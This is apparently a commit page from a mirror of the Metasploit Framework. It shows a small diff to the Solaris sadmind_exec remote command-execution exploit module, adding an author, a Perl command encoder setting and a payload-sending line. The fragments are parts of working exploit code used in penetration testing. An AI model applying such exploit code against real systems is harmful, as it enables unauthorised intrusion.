infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #3518, @midnitesnake's fix for solaris sadmind_exec

bug/bundler_fix
jvazquez-r7 2014-10-27 17:19:06 -05:00
parent 0b6406ae40 bc57e5d057
commit e6e4aaba3e
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 5 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
modules/exploits/solaris/sunrpc/sadmind_exec.rb
View File

@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
Vulnerable systems include solaris 2.7, 8, and 9
},
'Author' => [ 'vlad902 <vlad902[at]gmail.com>', 'hdm', 'cazz' ],
'Author' => [ 'vlad902 <vlad902[at]gmail.com>', 'hdm', 'cazz', 'midnitesnake' ],
'License' => MSF_LICENSE,
'References' =>
[
@ -35,9 +35,10 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00",
'Space' => 2000,
'BadChars' => "\x00",
'DisableNops' => true,
'EncoderType' => Msf::Encoder::Type::CmdUnixPerl,
'Compat' =>
{
'PayloadType' => 'cmd',
@ -83,6 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
hostname = datastore['HOSTNAME']
end
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
response = sadmind_request(hostname, payload.encoded)
sunrpc_destroy